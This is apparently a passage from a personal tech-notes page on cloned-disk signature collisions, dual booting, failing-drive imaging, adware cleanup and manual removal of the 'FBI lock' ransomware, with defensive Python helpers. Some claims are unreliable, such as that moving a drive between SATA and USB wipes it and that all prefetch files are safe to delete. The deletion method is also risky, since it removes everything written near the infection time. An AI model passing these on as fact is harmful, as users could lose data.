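        raise ValueError("not a valid MBR: missing 55AA boot marker")
    return struct.unpack_from("<I", mbr, SIG_OFFSET)[0]


def find_signature_collisions(mbrs):
    """Map each signature used by more than one disk to the disk indices using it."""
    seen = {}
    for idx, mbr in enumerate(mbrs):
        seen.setdefault(read_disk_signature(mbr), []).append(idx)
    return {sig: idxs for sig, idxs in seen.items() if len(idxs) > 1}


def rewrite_signature(mbr, taken, rng=secrets.randbits):
    """Return a copy of mbr with a fresh non-zero signature not in `taken`.

    Only the 4 signature bytes change; boot code and partition table are untouched.
    """
    new_sig = rng(32)
    while new_sig == 0 or new_sig in taken:
        new_sig = rng(32)
    patched = bytearray(mbr)
    struct.pack_into("<I", patched, SIG_OFFSET, new_sig)
    return bytes(patched)


def resolve_collisions(mbrs):
    """Return MBRs with unique signatures; index 0 (the disk booted from) is never changed."""
    result = list(mbrs)
    taken = {read_disk_signature(result[0])}
    for idx in range(1, len(result)):
        sig = read_disk_signature(result[idx])
        if sig in taken:
            result[idx] = rewrite_signature(result[idx], taken)
            sig = read_disk_signature(result[idx])
        taken.add(sig)
    return result


if __name__ == "__main__":
    # Constructed: a main disk and a byte-for-byte clone of its sector 0.
    main_disk = build_mbr(0x1234ABCD, [(True, 0x07, 2048, 204800)])
    clone_disk = bytes(main_disk)
    print("collisions:", {hex(s): i for s, i in
                          find_signature_collisions([main_disk, clone_disk]).items()})
    fixed = resolve_collisions([main_disk, clone_disk])
    print("after fix:", [hex(read_disk_signature(m)) for m in fixed])
```

On a real system the boot disk's signature is also what the BCD store uses to locate boot partitions, so a changed signature can invalidate existing boot entries; patching sector 0 by hand is for disk images and lab disks, not a live Windows drive.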

        EasyBCD looks like a useful boot tool, which I have only dipped my toe into. It has a lot of bootloader tools worth exploring and documentation worth reading.

        I had seen an article showing the raw bytes of the boot sector with this number, and they were viewing it with some sort of boot sector editor (or viewer). EasyBCD can be made to show the BCD ID in hex format of the non-active drive. This number is long, 32 hex digits in five groups. With trial and error I figured out {363exxxx-} is the original equipment 750 Gbyte Seagate hard drive and {5312xxxx-} is my 1 Tbyte clone Seagate drive. [update --- more testing showed it is not as simple as this. These ID numbers appear to be tied to the drive AND the bios drive sequence.]

EasyBCD settings for a working dual boot
       Here are photos of EasyBCD settings for a dual boot (that works!) with the main and clone drive plugged into sata connectors on the motherboard. The first photo is after booting Windows from the 750 Gbyte internal drive. The second photo is after booting Windows from the 1 Tbyte clone drive. I added the drive size in the name of the c drive icons (left, center) so I can tell at a glance which drive is in control.

 [Photo] EasyBCD settings screen after a boot from #1 showing some of the 750 Gbyte drive's desktop (left).

 [Photo] EasyBCD settings screen after a boot from #2 showing some of the 1 Tbyte clone drive's desktop (left).
 Note Turbo Tax (red icon) is installed on the clone and not the main drive,
 because the main hard drive has been developing disk errors and is soon to be replaced.

        I am going to keep the capacity of the clone drive larger than the main drive, as it is above. While bios boot options identify drives by their manuf model numbers, the Windows disk configuration screen shows only disk capacity and partitions. However, drive manuf and model # can be obtained by right clicking disk #, properties. Selecting a larger capacity drive to use as a clone drive makes it easy to identify the clone drive on the disk configuration screen. Going forward it's important that the main drive and clone drive not get mixed up, else stuff will get lost.

        I first thought if I added a 2nd clone drive, I should choose a 3rd capacity, but now that I see that I can get the manuf and model # from the disk configuration screen, maybe it's OK if two clones are similar. Haven't given much thought as to how to tell two clones apart.

Trick?
        [Update, The paragraph below explains how I first got the dual boot working, but I later found the bios drive boot sequence is not important. EasyBCD can set up the dual boot to work with either drive set first in the bios boot order.]

        The trick, or more accurately the change that I made, that got me to a sequence that worked was this: I changed the CMOS drive order, putting the clone first. Did it matter that this is opposite the motherboard connector number sequence? Don't know. Important that it is different (if it is) from the EasyBCD default? Don't know. Anyway, for some reason with this change to the CMOS bios drive sequence I could now select either drive. To do this I added one entry with name c drive and letter c:\, and a second entry with name f drive and letter f:\. When I later learned which drive each selected, I went back and put in more descriptive names in EasyBCD, because these are the names that show on the boot selection screen.

USB boot test (4/11/14)
        With the dual boot working fine with both drives connected to the motherboard sata connectors, I wondered what would happen if I again tried the clone drive on USB. All I had to do was unplug the clone's data cable from the motherboard sata connector and plug it into the sata-to-USB converter. Well, it didn't work, and something interesting happened. Up popped screens saying a new drive had been detected, but it had to be formatted. In the disk configuration screen there the clone drive was, but it was shown as RAW with no partitions.

        It looks like a drive set up on SATA cannot simply be moved to USB. Its partitions are not visible, so nothing on the drive is visible. It has to be reformatted while attached as a USB drive. I remember the same thing happened when I moved the clone drive from USB to SATA: I got the same popup screens telling me the new drive needed to be formatted.

        I wrote this up today in an Amazon pre-review of the enclosure I am buying that has both a USB 3 and an eSATA port. It's logical to think you can just try both a USB cable and an eSATA cable and use the one that's fastest, but unless USB 3 acts differently from USB 2, it's not that simple. Each time you switch the cable, at least with a bootable drive, all the data will be wiped clean from the drive because it needs to be formatted for the serial link that it is on.

        And of course, there is the not so minor matter that I have not yet figured out, after mucho hours of work, how to get a dual boot setup to work with one drive on SATA and one on USB.

Bootloader is changed
        Moving the clone drive from SATA to USB and back to SATA showed something interesting that bears on the signature collision issue. I didn't format the clone drive while on USB or do anything with it there except look at how it showed up on the disk configuration screen. I was very surprised when I hooked it back up to motherboard SATA, exactly like before, that my two EasyBCD menu choices of my working dual boot were gone and four different (default) option choices had appeared with four different drive letters, all of which booted to the same drive. Yikes. It looks like just hooking up a drive to a new machine (or link) can change its boot loader. This probably explains why plugging a drive into a different computer can cure a drive collision problem.

        There was no permanent harm done. After I deleted these four entries and added the two entries per EasyBCD documentation, my dual boot started working again and all the data on the drive was OK.

Disk image/clone procedure with failing drive
        This is my situation: my disk has bad blocks, most of which can be 'repaired' (or removed), but the disk soon develops more bad blocks. I have learned by trial and error that some image and clone software is more sensitive to bad blocks than others. It seems that some, like Windows image and Casper image, will fail with one (or very few) bad blocks, whereas others (Macrium) are more tolerant, though even those I found can fail due to bad blocks too.

        I read the best low level repair tools are available from the disk manufacturers. Find out who makes the sick internal drive and go to that manufacturer for downloadable tools. Seagate has two: one for Windows, which can only do analysis, but (importantly) not repair, and a DOS tool that can 'repair' bad sectors, though I am not sure what 'repair' actually means, and remove bad sectors. DOS tools must be run from a bootable DVD. This allows the program to load and run from RAM without the internal disk being used. In this way the RAM program has free access to the disk and can modify any sector.

        There's a complication with DOS tools run from a bootable DVD, which is of course making the DVD! Seagate provides an .iso file (raw DVD image) that can be downloaded, and which then must be burned to a writable (DVD+R) disk. I have done this, but don't have a clean procedure for it. I used PowerISO, which I had used earlier to burn a Microsoft .iso file of Windows 7 to do a repair install (which failed). It's free and makes the DVD quickly, but it downloads a bunch of crap (PureLeads) which totally screwed up my browser. Avoid PowerISO. Seagate claimed Windows 7 had native capability to burn the .iso image, but I tried this and it didn't work. It just copied the .iso image to the disk, but to burn an .iso file and make a functioning disk it must first be expanded to show the files, which the Windows burn didn't do.

        Here is the best procedure to get the best possible image and/or clone. Before you run image or clone programs you first want to get rid of, and repair if possible, as many bad blocks as possible. This is critical: not only will it give you the best quality image/clone, without it you may not get any image/clone at all. A lot of the image/copy programs will just fail and exit when they run into a bad block they can't read. It takes hours to do this, so run it overnight. It may be necessary to keep running the repair tool when more bad blocks show up, which I found happened to me within hours.

    1) First (overnight) run a DOS tool from the disk manufacturer, choosing the long scan that can 'repair' and remove bad blocks. The Seagate DOS tool runs for hours to scan the whole disk and find bad sectors. At the end it shows the bad blocks it found and gives you the choice as to whether or not to repair them. The last 'repair' step is fast, just a few minutes.

    2) Run image software, maybe running those programs most sensitive to bad blocks first. I find these are Windows image and Casper image.

    3) Run image/clone software that is less sensitive to bad blocks. I find these are Macrium image and Casper clone. Casper clone is nice in that if it can't read a block, not only will it keep going, it will tell you in its report (see Exceptions) which file(s) contain the bad blocks. This is the only tool I have which tells you which files are affected by bad blocks. Obviously this is very valuable information! In one case I found the only file affected was some unimportant thumbnail cache that Explorer keeps to speed up directories, which can just be deleted, as it will be rebuilt. In the second case it was some Opera file in the user directory (purpose unknown). If this bad block turned out to create a problem, obviously the fix is easy: just reinstall (and re-setup) this one program.

Booting Windows 7 from USB drive
        Forum poster says registry changes are required to get Windows 7 to boot from an external USB drive --- "An external drive? Windows 7 won't boot natively via usb if that is what you are trying. It is possible, with a couple of registry changes."

=========================================================================================================
=========================================================================================================
More virus type annoying software
        Trying to get rid of the yield.manager popup I downloaded several new anti-malware programs, and even though I was careful this has led to new corruption. One way these new programs get installed is by the installer programs for the 'free' (anti-malware) program you are downloading. If offered I always choose custom installation, and unclick the add-on programs the installer brings along. Another suspect is the supposed anti-malware AdAware I downloaded and a few days later uninstalled. (It was the second most downloaded anti-malware on CNET, after Malwarebytes, but I don't trust it given its aggressive nature, and problems like regedit.exe stopping working just after uninstalling it. I saw one user blame his not working 'regedit' on AdAware.)

Softonic
        Another bunch of aggressive annoying downloads have come from Softonic (http://grabit.en.softonic.com). This has not affected me much, but only because the browsers that it attacks I don't use much. On at least two browsers (Mozilla, Chrome) it had installed a locking toolbar called:

                        IB Updater toolbar
                       Incredibar toolbar                          http://mystart.incredibar.com
                        MyStart toolbar ?

        Mozilla on its own identified this IB Updater toolbar as nasty, bringing up a set of user feedbacks about it, and offered to block it. Mozilla says it has been universally "side-installed" by a 3rd party. Anti-malware HitmanPro also identified Softonic as trouble. Softonic is thought to download a bunch of troublesome stuff. Google search shows Incredibar toolbar as a virus. According to one poster, whenever he opens a new tab Incredibar goes to the web and calls a page to download.

AdAware to blame?
        Based on timing and its aggressive nature I suspect AdAware (supposedly anti-malware), which I downloaded to fight yieldmanager (useless), may be the cause of this. I uninstalled AdAware after a few days as I did not like its aggressive nature, acting more like malware than anti-malware. It was just after I uninstalled it that I found the Windows 7 registry utility (regedit.exe) would no longer run. So I suspect AdAware here too.

        A search for 'Softonic' turned up several entries which I deleted. One was an addon for KMPlayer, my main video player. (I have not seen any change in KMPlayer's operation.)

---------------------------------------
(earlier notes)

Flash cookies
        What I discovered was this file was in a folder (first below) buried about ten layers deep that specified settings ('settings.sol') associated with 'Macromedia\Flash player'. A similar list of dubious 'flash cookies' is also to be found in the second folder.

        c:\users\window_7\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\
        c:\users\window_7\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\LAD342JP\

        In the first directory I could see from the filenames, some trustworthy like Vanguard, others much less trustworthy, that what look like 'Flash cookies' are being deposited. Each directory held only one file named 'settings.sol'. I deleted all the directories under 'sys', and so far my popup flash ads are gone. Later I found in the 2nd folder a similar list of dubious sites, most of them in the form xxxxx.com. I cleaned out this directory too. 100 sites had dropped 'flash cookies' here. A quick test shows a flash video plays OK, and I can see it writes into these directories, so cleaning out these directories looks like a history cleaning. My popups are still gone. This looks like a fix.

        With hindsight I probably made a mistake. There must be an underlying trojan program downloading the ads. I should have looked at the settings filetime, and used its filetime to try and find the program calling the ads. Wait, there is one file still in this directory dated a couple of hours ago, maybe the last time the ad popped up. I did a file search around its time window and bingo, I find a very suspicious pair of programs in

          c:\windows\prefetch\AgGIUAD_(long random number)

------------------------------
(This stuff is OK: ReadyBoot, Trace, agGIRAD are part of a Microsoft boot speedup that is adaptive. It traces what is usually called, then prefetches it to speed things up. The good news is I suspect deleting this stuff did not cause any real harm.)

        A check of the directory 'c:\windows\prefetch' includes dozens of programs, many written in the last two days, a few of which look OK, but many are difficult to decipher. I suspect they all can be deleted. Even more suspicious I find a (single) subdirectory

        c:\windows\prefetch\ReadyBoot

        ReadyBoot contains only files all named 'Trace' (Trace6, Trace7, etc.) installed within the last two days. Talk about suspicious! I am deleting the ReadyBoot subdirectory and the two 'AgGIUAD' files, but I suspect all the files in c:\windows\prefetch\ can probably go, as I don't think prefetching any file is very important. I also plan to do a registry search for 'AgGIUAD'. It came up empty.
------------------------
CCleaner to the rescue
        I wondered, does 'CCleaner' clean out the Flash folders? The answer is it doesn't by default, but it can! Just click the Adobe Flash Player (under Multimedia). It also has an option to delete 'old prefetch data', so I clicked that too. Looks like CCleaner may be a simple way to clean out Flash popup ads. Next time try it.

Notes on popup ad war
        Cleaning efforts get rid of ads for a few hours, but they come back. Sometimes I find the same file fragments as I deleted.

        While something on my machine is calling these popups, I have not been able to find it. Another way to fight these popups that I see recommended is to have your browser block the sites from which the popups come. Obviously this is less desirable than getting at the root, the program calling them, and I see they have several different sources.

        A Google search shows 'yieldmanager.net' is a cookie tracker and is associated with popups. Sure enough I find it in the cookie list of my browser Opera.

Reference for getting rid of ad.yieldmanager
       This looks good.
http://www.zomocainc.com/2007/07/13/how-to-remove-adyieldmanagercom-popup-spyware/

New York Times article about FBI lock virus (12/5/12)
        Reports it is hitting the US big time with 16 different gangs in Russia doing this. Nearly zero useful info on recovery. (No mention of Malwarebytes Anti-Malware.) They do say that if you pay, the crooks rarely unlock your machine. Also they say while your computer is unlocked the crooks can explore it and steal stuff.

http://www.nytimes.com/2012/12/06/technology/ransomware-is-expanding-in-the-united-states.html?ref=todayspaper&_r=0
=================================================================================================

FBI computer lock virus --- How to recover details (Aug/Dec 2012)
 “Computer Locked by FBI Moneypak Virus Asking to Pay $200 Fine to Unlock?”

Introduction
        This virus is horrible. I have been hit by this thing about ten times in recent months. A recent article in the New York Times about 'ransomware' (mentioning the FBI Lock virus) said this threat has become much more common, with 16 gangs working on extorting money this way. I read that if you just click the 'wrong' link your computer is hijacked, that there is no action you can take to prevent being infected, that you don't have to open or run anything to be infected. Well maybe, but after being attacked so many times I think I can be a little more specific. I strongly suspect that the attack is triggered by clicking on a video to run it. The video is either infected, or maybe the video screen and start arrow are just fakes on a fake screen and the 'run' click initiates a download. Maybe it's a bug in Flash that is being exploited; I don't really know. But being careful about running videos on dodgy sites might give a modicum of protection.

        Why the authorities cannot shut down the criminals running this scam, I don't know. I mean they ask you to send them money! How hard can it be to find them? (Or are they in lawless Russia?)

        I have been hit so many times that I am quite an expert in how it acts and getting pretty good at recovery. I have all the recovery tools I need on my computer and can now recover and clean up my files in about 30 minutes. Every attack is a little different. The opening screens are different, the location and names of the virus files move around a little. One time the attack came with an MP3 file, so not only was my computer locked, but a voice kept repeating "your computer is locked". I don't have a webcam on my desktop, but I read that it often freaks out those being attacked by starting the webcam and showing the user's face on the screen.

** New variant of FBI Lock virus disables Safe mode recovery details (update 12/24/12)
        After recovering so many times over the last few months from the FBI lock virus, I knew it very well, but today I got attacked by a more advanced and nastier variant that also disables Safe mode, so there is no easy way to regain control. I finally recovered, but it was MUCH more difficult and took a long time. The virus writing gangs have addressed both of the weaknesses of the virus that I had identified.

        One, you can no longer regain control by booting into Safe mode! When I tried this, Safe mode started to load files normally, but I ended up with just a blank white screen. Even Ctrl-Alt-Del access to Task Manager was blocked (it just flashes and disappears). No access to Safe mode makes recovery much more difficult. The only approach left (that I know) is to boot from recovery disks. Luckily not only had I recently bought a set from HP, but just today I made my own recovery DVD. If you don't have recovery disks, I know of no way of recovering without changing the hard drive! (Maybe running anti-malware from a flash drive?)

        I put in the recovery DVD I had just made and (pressing any keyboard key) booted into it. It worked and brought up a bunch of tools. One possible fix that I did not try was System Restore. I had two restore points made in the last two days (still there). I had also made a disk image today, but this was painfully slow, several hours copying 250 Gbytes to a USB hard drive.

        Here is the long series of steps I went through that eventually allowed me to delete the virus and recover. (Obviously I have no way of knowing if all these steps are necessary.) The last two steps detail the files I found for this virus variant and when they downloaded.

            -- Startup Repair tool  ---- reported no boot errors
            -- Command prompt tool --- try to run System File Checker [sfc.exe /scannow]. Won't run as it says boot repair has
                                            a restart pending
            -- Reboot (F8) into 'Safe mode with Command prompt' --- Works, I get a command prompt.
                                            Run System File Checker (10 min), then exit. This brings up Safe mode, better but still damaged.
                                            Safe mode now has black screen with Safe in four corners, but now Ctrl-Alt-Del works and gets
                                            me to Task Manager. From there (file, run, browse) allows me to navigate in Explorer
                                            so I can run Malwarebytes or (Mythicsoft) Agent Ransack.
            -- Run Agent Ransack in Safe mode --- Do a file search around the time of the lockup. I see Malwarebytes log write
                                            and at same exact time two 124 kbyte .tmp files written (8240.tmp and 8241.tmp), but (unlike every
                                            previous attack) I find no '.exe' file in the few minutes preceding the lockup. Big problem, the
                                            main virus .exe file is not found!
            -- Still in Safe mode I open Malwarebytes log in Notepad. It has three trojan entries (and a few in recycle bin). Two
                                            are the .tmp files I noted above (8240.tmp and 8241.tmp) at the same time as the log is written.
                                            But the log contains another trojan entry about 19 minutes earlier (FCBC.tmp) also a tmp file.
            -- Run Agent Ransack again in Safe mode --- This time with the search centered around the 19 minute earlier time noted
                                            in the Malwarebytes log. Bingo! Eight seconds before the log entry is what looks like the virus .exe file
                                            (xaARWGa.exe, 121 kbytes), and at the exact time of the log entry for FCBC.tmp trojan a suspicious
                                            file (uwjgotw.zpf, 186 kbytes). There are also at these times a bunch of picture files (.jpg and .png)
                                            with an .htm file (main.htm) that together very likely are the phony FBI screen.

        Deleted all the suspect files around these two times (19 minutes apart), and I had recovered. A scan by Malwarebytes came up clean except for a registry entry. This long process took nearly two hours. Googling 'xaARWGa.exe' I find only one entry for it on a malware site: it had shown up first time a month ago in UK, was unsigned, but it was not known if it was dangerous. (I bet it is!)

Summary
        I booted with Windows recovery disks and ran one of its tools: Startup repair. I found I could then boot (F8) into 'Safe mode with command prompt', where I ran System File Checker. After this, I found Ctrl-Alt-Del interrupt was now working (it had been previously disabled by the virus), so I could get to Task Manager and from there to Explorer with the ability to run anti-malware tools. Next time I would try the following shortcut:

        Try booting (F8) directly into 'Safe mode with command prompt'. It's possible that the virus doesn't block this mode. If this works, then see if Ctrl-Alt-Del will get you to Task Manager, or type 'exit' and then try Ctrl-Alt-Del. If these shortcuts don't work, then the recovery tools (Startup Repair and/or System File Checker) must be doing some good and helping with the recovery.
------------------------------------------------------
(old) FBI Lock virus has some flaws
        One flaw is that the FBI Lock virus runs immediately when it downloads. This means if you can get control of your machine, you can find and delete the virus files. Any .exe files (first) written at the time the machine locked up are very likely the key virus files.

        Second flaw is that after your machine locks you can regain control by booting up in Safe Mode (tap F8 while booting).

        Third flaw is that (free) anti-malware can usually find and kill this virus. Run it in Safe mode. I use the highly regarded free version of Malwarebytes Anti-Malware. Every time, but one, it detected the virus and offered to kill it. In my experience it doesn't always find all the virus files, so a manual search for files downloaded at the same time will sometimes pick up other virus fragments like shortcuts and prefetches.

Attack and recovery
        The sign an attack has begun is that without warning the (fake) 'FBI logo warning screen' suddenly pops up covering the whole screen, and in 1 or 2 seconds your computer really is locked up: keyboard and mouse don't work and even the interrupt Ctrl-Alt-Del is disabled. Your only option is to power down. The best thing to do is to immediately power down by holding the power switch, and, to later find the virus files, take note of the time. While not essential, it's good to wait a few minutes before powering up again. The reason for the wait is to make a gap in file times, so you can easily separate files written by the boot from those written around the time of the infection.

        When you click an infected link, the virus files quickly load and once loaded immediately lock the machine. This means that all the virus files will have filetimes very close together, usually the same to the second. Windows Explorer only shows file times to the minute, but Windows internally tracks time to higher resolution. I use and recommend the free search tool below: Agent Ransack from Mythicsoft

         http://www.mythicsoft.com/page.aspx?type=agentransack&page=home

        It shows file times to the second and can do file searches for files written in a narrow time window, making it relatively easy to find all the virus files. Typically there are 4-6 virus files, usually written at exactly the same time (to the second). A common pattern is to see two or three .exe files written at exactly the same time (to the second) to different locations and with different names. The key that this is the virus writing multiple copies of itself to your hard drive is that all the files are the same size (roughly 100 kbytes).

        I learned the hard way it is not enough to just delete one of the virus .exe files (say those in c:\user). If you don't get rid of all copies of the virus key (.exe) files, you will find the computer instantly relocks when you reboot. So the key to recovery is to find the exact file time, typically a 1-3 second window, and delete pretty much all the files (first) written to your hard drive in this window. Even in such a tight time window I might find a dozen to two dozen files (applications write temporary files all the time), but loss of tmp files does no harm, and with such a tight time window it is unlikely that a key system or application file will get deleted by mistake.

        When the computer locks up, I power down and note the time. By waiting a few minutes before rebooting I know the virus files are somewhere in the 100 or so files written in the last minute. If I can find just one virus file, then I know I can find the rest of them because they will have the same, or almost the same, file time. If an anti-malware scan finds a target or two, I don't let the anti-malware quarantine it; instead I note the location and use my Agent Ransack search utility to find its exact file time.

        While anti-malware makes recovery easier, it can be done manually. I just did it on my last attack. Sort the files of the last minute by type and locate the few .exe files ('application' files). Some of the virus files are in this group. See the same size .exe file written at the exact same time to two locations? Very suspicious. These are probably virus files; note the time. See an .exe file whose name appears to be a long random string of letters or numbers? Very suspicious. Good chance this is a virus file; note its time.

        Before deleting the (random).exe virus file, typically 96k to 116k, note the filename(s), because there may be a registry value pointing to this file that also needs to be cleaned out. Not sure how vital deleting the registry value is, but I suspect that if it remains and points to a non-existent file, it's just an annoyance at startup and can be cleaned up later.

MalwareBytes Anti-Malware
        The free program I use to find the virus files is the widely recommended 'MalwareBytes Anti-Malware', and it has identified some (generally two) of the virus files almost every time, however, it failed once to find anything. Another free program that I read will find the FBI lock virus files is 'HitmanPro Cloud Antimalware'. The only time I tried HitmanPro is when MalwareBytes failed to find the virus, and it failed too. MalwareBytes Anti-Malware doing a quick scan (3 min) under Safe mode has always in my experience reliably found two of the virus files (without a lot of false hits). It offers to delete these files, and for many this may be all that is necessary to recover, but I want to go further and remove all traces of the virus.

(Update Nov 16, 2012)
        'MalwareBytes Anti-Malware' has been on my computer for a couple of months. Twice during this time it has popped up a window saying it has blocked a virus attack giving the file name and asking if I wanted it killed, to which I say yes. From the filename this virus that it catches 'in the act' and kills does not appear to be the FBI lock virus. As far as I can tell MalwareBytes has never stopped an FBI lock virus attack, it just helps with cleanup running in Safe mode.

        In a recent FBI lock virus attack I did not run MalwareBytes. I decided to see if I could recover manually, which I did successfully. In looking through the files at the time of the attack I noticed something curious. At the very second of the attack some change was made in a folder labeled as a 'MalwareBytes log'. I can think of two possible explanations. One is that the virus writers are now attacking trying to disable MalwareBytes, or two, and probably more likely, MalwareBytes detected the virus attack when it occurred noting the virus filename and location for identification after the fact. Pretty sure the latter is correct. Looking more at Malwarebyte logs I see it often has logged trojans as they were downloaded with the notation "Allow".

Virus hides as Task Scheduler
        In my recent attack, before running MalwareBytes I had already located the two virus .exe files (almost for sure two copies of the same file, same size (116k) and written at the exact same time, even though, as is common, with different file names). When I ran MalwareBytes it only found one trojan; this was the copy of the virus .exe file with a long random name. The other virus .exe copy, which MalwareBytes had missed, had a system sounding name (TaskScheduler.exe), and the virus had placed at the same time a 1k shortcut file in the Windows Startup folder to call it (taskscheduler.lnk). I bet that if I had depended this time only on Malwarebytes' quarantine, I would have still been locked up on reboot, because I found out the hard way earlier that one remaining .exe virus file is all it takes.

My standard procedure for deleting FBI lock virus
        What I do now when attacked by the FBI virus is just use the anti-malware program to find one or more key virus files, but I don't allow it to delete them. I write down what it shows are the file locations and file times. The larger of the virus files is nearly always found in one of the subdirectories of 'C:\users\Window_7\', and often there is a virus file in c:\windows\prefetch. File names associated with the virus often contain 'Isass' and 'ctfmon'. It's not uncommon to find additional virus files with long random filenames. Sometimes one of the virus files is a shortcut. Wherever the shortcut points (see properties) is almost for sure corrupted too, so delete that file.

Malware fail (Nov 10, 2012)
        On another attack today of the FBI lock virus both of my anti-malware programs (see above) failed to detect the virus. Maybe the virus is getting smarter. The good news is I was able to recover manually using my procedure and the great search program 'Agent Ransack', which can search files in a tight time window and shows file times to the second.  However, it took me three tries and about two hours.

        The reason it took three tries was I did too narrow a search the first two times. The first time I stupidly searched just the c:\user folder (saving just a few minutes), where I know from past experience virus files are always found. What I forgot is that the virus puts copies of the key files in several locations outside c:\user. When I rebooted the supposedly clean machine, it locked up almost instantly (1-2 seconds after the desktop appeared). On my second cleaning I widened the search to the whole c:\ drive, but set the search time window (only) around the time of the second attack. Big mistake: it means I missed files that were time stamped with the time of the first attack, so again on boot up, with the virus files still on the machine from the original attack, the machine locked up again.

Manual cleaning succeeds (Nov 10, 2012)
        Finally recovery effort #3 succeeded. When I started cleaning #3, I didn't understand that the virus files from the original attack a couple of hours earlier were still on the machine, but I remembered there was often a virus file in a 'prefetch' directory, so I thought that maybe this was calling a new copy of the virus at power up. To prevent this I powered down my cable modem before repowering my machine (with hindsight I doubt this was necessary). This time when I started cleaning (searching c:\), I looked at the 'prefetch' folder, and there was a file with the time stamp of the original attack (two hours earlier). I now realized my error, that I had missed virus files in my first two cleanings and that I needed to do a search of c:\ centered on the time of the original attack, and sure enough I found a bunch of virus files.

        I found virus files in these folders:
                  c:\user                                                   (various subdirectories)
                  c:\windows\prefetch
                  c:\windows
                  c:\programdata                                      (registry value pointed to virus .exe files in this folder)
                  registry value (search using filename of virus .exe file)

        The lock virus files are (for me) pretty easy to recognize. Files and directories that turn up in the narrow time window search and have names that look like long random letter or number strings are very likely virus files. The (random).exe file (96k or 100k) is probably the key file, and I found two or three copies of it (with same name, size, and timestamp), and also another copy (same length and time stamp) but with a different filename consisting of a long random number string. My virus .exe filename in this attack was 'fsbpleuk.exe', but it is different in every attack. I used this filename ('fsbpleuk') to search the registry using the Windows tool 'regedit', and sure enough I found a registry value pointing to [c:\programdata\fsbpleuk.exe], which I deleted along with the virus files.

Nature of the 'lock' screen files
       I found the 'lock' screen is not a single image file but about a dozen or so small fragment image files and an associated .html file that pulls them together, and all of it resides on the hard drive. The virus created a subdirectory in 'c:\programdata' whose name consisted of a long random letter string (hence it looks suspicious), and in there went the files associated with the lock screen. Curiously, the names of these fragment image files for the lock screen were readable, with their function spelled out (in English); for example one was 'moneypak.png'.

Agent Ransack
       I have on my machine a very good, free, general purpose search program called 'Agent Ransack'. This search engine is much (much!) better than the Windows built-in search. With this tool (still in safe mode) I search the whole c:\ directory for files changed within a 2 or 3 minute window (before and after) the identified virus file time. In a few minutes it generally comes up with two or three pages of files, and they can be sorted by time (to the second; Windows just shows file times to the minute). Since you know the name, location and approximate time of at least one or two of the virus files from the malware program, find these files in the Agent Ransack list. Any files that have nearly the same file times (to the second) are very suspect and can probably be deleted. In fact I have found that I can generally delete nearly everything (dozens of files) within 30 seconds or so of the virus files without any problem. Most of these files are apparently temp files written by running programs. The only problem I ever had was that I deleted the local copy of my emails and had to download them again from the server. I now watch out for that file.
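The time-window sweep described above, written out as an added Python example (my code, not the essay's and not Agent Ransack): it lists every file whose modification time falls within a window around one known malicious file's time, sorted to the second, flags random-looking names with a crude heuristic of my own, and runs against a constructed sample tree that mimics the essay's folders (sample files, not real malware).

```python
import os
import re
import shutil
import tempfile
import time
from datetime import datetime

# Crude name heuristic (an assumption of this example, not Agent Ransack's):
# a stem that is all digits and 10+ long, or all letters with a run of four
# or more consonants (e.g. 'fsbpleuk', 'wgsdgsdgdsgsd'). Some real system
# names (svchost, ctfmon) trip it too, so it is a hint, not a verdict; the
# time window is the primary signal, exactly as the essay says.
_CONSONANT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxyz]{4}")

def looks_random(name):
    """True if a file or directory name looks like a random string."""
    stem = os.path.splitext(os.path.basename(name))[0].lower()
    if stem.isdigit():
        return len(stem) >= 10
    return stem.isalpha() and len(stem) >= 6 and bool(_CONSONANT_RUN.search(stem))

def find_files_near(root, attack_time, window_seconds=120):
    """Walk `root` and return (hits, odd_dirs): hits is a time-sorted list of
    (mtime, path) for files modified within `window_seconds` of `attack_time`
    (epoch seconds); odd_dirs lists directories with random-looking names."""
    hits, odd_dirs = [], []
    for dirpath, dirs, files in os.walk(root):
        odd_dirs.extend(os.path.join(dirpath, d) for d in dirs if looks_random(d))
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mtime = os.stat(path).st_mtime
            except OSError:
                continue          # locked or unreadable: skip it, keep sweeping
            if abs(mtime - attack_time) <= window_seconds:
                hits.append((mtime, path))
    hits.sort()
    return hits, odd_dirs

def report(hits, root):
    """Render hits as 'time-to-the-second  path' lines, flagging odd names."""
    lines = []
    for mtime, path in hits:
        stamp = datetime.fromtimestamp(mtime).strftime("%Y-%m-%d %H:%M:%S")
        flag = "   <-- random-looking name" if looks_random(path) else ""
        lines.append(f"{stamp}  {os.path.relpath(path, root)}{flag}")
    return lines

def build_sample_tree():
    """Construct a throwaway tree mimicking the essay's findings (constructed
    sample files, not real malware). Returns (root, attack_time)."""
    root = tempfile.mkdtemp(prefix="sweep_demo_")
    attack = time.time() - 7200                   # 'two hours earlier'
    startup = "Users/Windows_7/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
    layout = {
        "ProgramData/fsbpleuk.exe": attack,
        "ProgramData/8273645512918/moneypak.png": attack + 3,
        startup + "/ctfmon.lnk": attack + 5,
        "Users/Windows_7/AppData/Local/Temp/cache.tmp": attack + 15,
        "Windows/Prefetch/FSBPLEUK.EXE-1A2B3C4D.pf": attack + 20,
        "Users/Windows_7/Documents/notes.txt": attack - 86400,   # a day old
    }
    for rel, mtime in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"sample")
        os.utime(path, (mtime, mtime))
    return root, attack

def sweep_demo(window_seconds=120):
    """Build the sample tree, sweep it, and return (hit file names, odd dir
    names); the tree is deleted afterwards."""
    root, attack = build_sample_tree()
    try:
        hits, odd_dirs = find_files_near(root, attack, window_seconds)
        return ([os.path.basename(p) for _, p in hits],
                [os.path.basename(d) for d in odd_dirs])
    finally:
        shutil.rmtree(root, ignore_errors=True)

if __name__ == "__main__":
    root, attack = build_sample_tree()
    hits, odd_dirs = find_files_near(root, attack)
    print("\n".join(report(hits, root)))
    print("random-looking directories:", [os.path.relpath(d, root) for d in odd_dirs])
    shutil.rmtree(root, ignore_errors=True)
```

To run it against a real drive, call find_files_near with the drive root and the epoch time of the file the malware scanner identified, then review (not bulk delete) what sits within a few seconds of it.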

CCleaner
